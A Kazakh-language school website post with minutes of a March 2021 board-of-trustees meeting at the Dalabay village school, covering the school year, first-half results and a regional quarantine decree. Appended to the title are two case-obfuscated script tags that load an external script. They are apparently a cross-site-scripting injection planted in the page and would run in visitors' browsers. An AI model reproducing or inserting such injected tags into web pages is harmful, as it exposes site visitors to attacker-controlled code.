Далабай ауылының негізгі орта мектебінде өткен қамқорлық кеңес отырысы жөнінде ақпарат<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

12.03.2021

           Ақмола   облысы   Білім  басқырмасының  хаты  негізінде  Далабай ауылының  негізгі  орта  мектебінде  12 наурыз  күні  санитарлық жағдайларды сақтай отырып, қамқорлық  кеңес отырысы өтті. Сөзді  мектеп  директоры Амиргазина Т.М. бастады.  Ол 2020-2021 оқу жылында   білім беру үрдісінің  ұйымдастырылуы жөнінде  ақпарат берді. Сонымен қатар оқу ісінің  меңгерушісі  Курмантаева А.И.  І жартыжылдық   бойынша  білім  сапасының  қорытындысы, оқушылардың  байқаулар  мен  олимпиадаларға  қатысуын, демалыс  күндері  туралы  айтып  өтті.

           Тәрбие  ісінің  меңгерушісі  Төлегенова М.М. 2021 жылғы  09 наурыздағы   Ақмола  облысының  бас санитарлық  дәрігерінің  «Ақмола  облысы  бойынша  карантиндік  шараларды  жеңілдету»  туралы  №12 қаулысымен  таныстырды. 

 

Мектеп   директоры:                 Т. Амиргазина    

 

ХАТТАМА         

№2

 

Қатысқандар: 9

Қатыспағандар: 0

 

Күн  тәртібінде

  1. Далабай  ауылының  негізгі  орта  мектебінде  2020 – 2021 оқу жылына білім беру үрдісін  ұйымдастыру. Мектеп  директоры  Амиргазина Т.М.
  2. І жартыжылдық  бойынша  қорытынды  оқу ісінің  меңгерушісі  А.Курмантаева
  3. Бас санитарлық  дәрігердің  қаулысы  М.Төлегенова

 

Бірінші  сұрақ  бойынша  сөзді  мектеп  директоры Амиргазина Т.М. бастады.  Ол 2020-2021 оқу жылында   білім беру үрдісінің  ұйымдастырылуы жөнінде  ақпарат берді.

          Екінші  сұрақ  бойынша  оқу ісінің  меңгерушісі  Курмантаева А.И.  І жартыжылдық   бойынша  білім  сапасының  қорытындысы, оқушылардың  байқаулар  мен  олимпиадаларға  қатысуын, демалыс  күндері  туралы  айтып  өтті.

         Үшінші  сұрақ  бойынша  қамқорлық  кеңесі  тарапынан  сұрақ болған жоқ.

 

Шешім:

  1. Қамқорлық  кеңес  отырысы  жөніндегі   ақпаратты   мектеп  сайтына  жариялау.
  2. Жиынтық  бағалау  балдарын уақытылы  қойып  отыру,  бағалау қорытындысын ата-аналарға  хабарлап отыру.
  3. Карантиндік  талаптарды   сақтау,  өзіне және айналадағы  адамдарға  қауіп – қатер  тудырмау. Ауру  белгілері  пайда  болған жағдайда медициналық  мекемеге  хабарлау.

 

                                Мектеп  директоры:                Т.Амиргазина

                                Хатшы:                                      М.Тагабергенова

Просмотров: 602


Пікір қосу



Деректерді қолтаңбаға қосу